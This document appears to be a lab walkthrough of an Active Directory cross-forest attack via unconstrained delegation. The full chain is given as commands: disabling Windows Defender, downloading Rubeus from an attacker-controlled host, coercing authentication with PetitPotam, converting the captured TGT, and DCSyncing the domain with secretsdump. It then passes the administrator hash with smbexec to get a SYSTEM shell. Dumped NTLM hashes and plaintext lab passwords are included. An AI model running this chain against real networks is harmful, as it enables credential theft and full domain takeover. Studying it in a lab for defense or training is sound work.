Use unconstrained delegation

• From NewYork we can rule the Maryland domain with unconstrained delegation

• We connect to NewYork with rdp as an administrator

xfreerdp /d:newyork.local /u:mateo.Pacheco /p:'elsenorpacheco' /v:192.168.56.10 /size:80%  /cert-ignore

• For more simplicity we will disable defender

• Now we launch rubeus.exe to wait for a TGT of the essos forest.

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/Rubeus.exe', 'C:\Users\mateo.Pacheco\Desktop\Rubeus.exe')

Disable Defender and upload again

Set-MpPreference -DisableRealtimeMonitoring $true

.\Rubeus.exe monitor /filteruser:BALTIMORE$ /interval:1

• And we run petitpotam on our linux console to force a coerce of maryland to newyork.

Download Petipotam.py

wget https://raw.githubusercontent.com/topotam/PetitPotam/main/PetitPotam.py

petitpotam.py -u pablo.sandoval -p baseballpanda -d north.newyork.local nyc.newyork.local baltimore.maryland.local

• And we get the TGT of Baltimore!

• Now we can copy it to linux (delete space and \n)

• Decode the base64 and save it to a kirbi file

base64 -d rubeus.b64 > baltimore.kirbi

• Convert it to ccache and use it to dcsync maryland.local

ticketConverter.py baltimore.kirbi baltimore.ccache 
export KRB5CCNAME=/workspace/trusts/unconstrained/baltimore.ccache
secretsdump.py -k -no-pass -just-dc-ntlm maryland.local/'BALTIMORE$'@baltimore.maryland.local


[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:10f39f5a270977c56ac002b2c9cd660f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:e205909d5d55a6d75365f15defbf27fb:::
marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:0067621d2cb3ac05314b36ee408c7e51:::
SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:da0edcfd9de34981b3bad4979882ec22:::
newyork$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
[*] Cleaning up... 

Got Shell?

smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da  maryland.local/'administrator'@baltimore.maryland.local
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>